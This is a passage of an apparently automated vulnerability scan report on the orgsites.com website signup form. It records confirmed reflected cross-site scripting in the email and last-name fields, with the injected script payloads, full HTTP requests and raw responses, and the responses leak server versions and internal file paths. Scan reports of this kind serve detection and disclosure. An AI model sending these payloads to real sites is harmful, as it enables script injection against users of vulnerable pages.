</font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST '"--></style></script><script>alert(0x002A91)</script>
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 306
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A91)%3c%2fscript%3e&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:52:45 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="\'\"--></style></script><script>netsparker(0x002A91)</script>"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" NAME="subs" ..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST '"--></style></script><script>alert(0x002A8F)</script>
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my site!
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 361
Accept-Encoding: gzip, deflate

firstN=3&lastN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A8F)%3c%2fscript%3e&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+site!&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:52:37 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><br><b>Warning</b>: Missing argument 1 for joinpage() in <b>/home/glnorg/public_html/002_Website.php3</b> on line <b>84</b><br><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b><font color="#FF0000">Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1"></font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="\'\"--></style></script><script>netsparker(0x002A8F)</script>"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000"><b>*USER ID !!</b></font></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"><br/><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial,..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST '"--></style></script><script>alert(0x002A9E)</script>
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my site!
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 338
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002A9E)%3c%2fscript%3e&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+site!&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:53:47 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


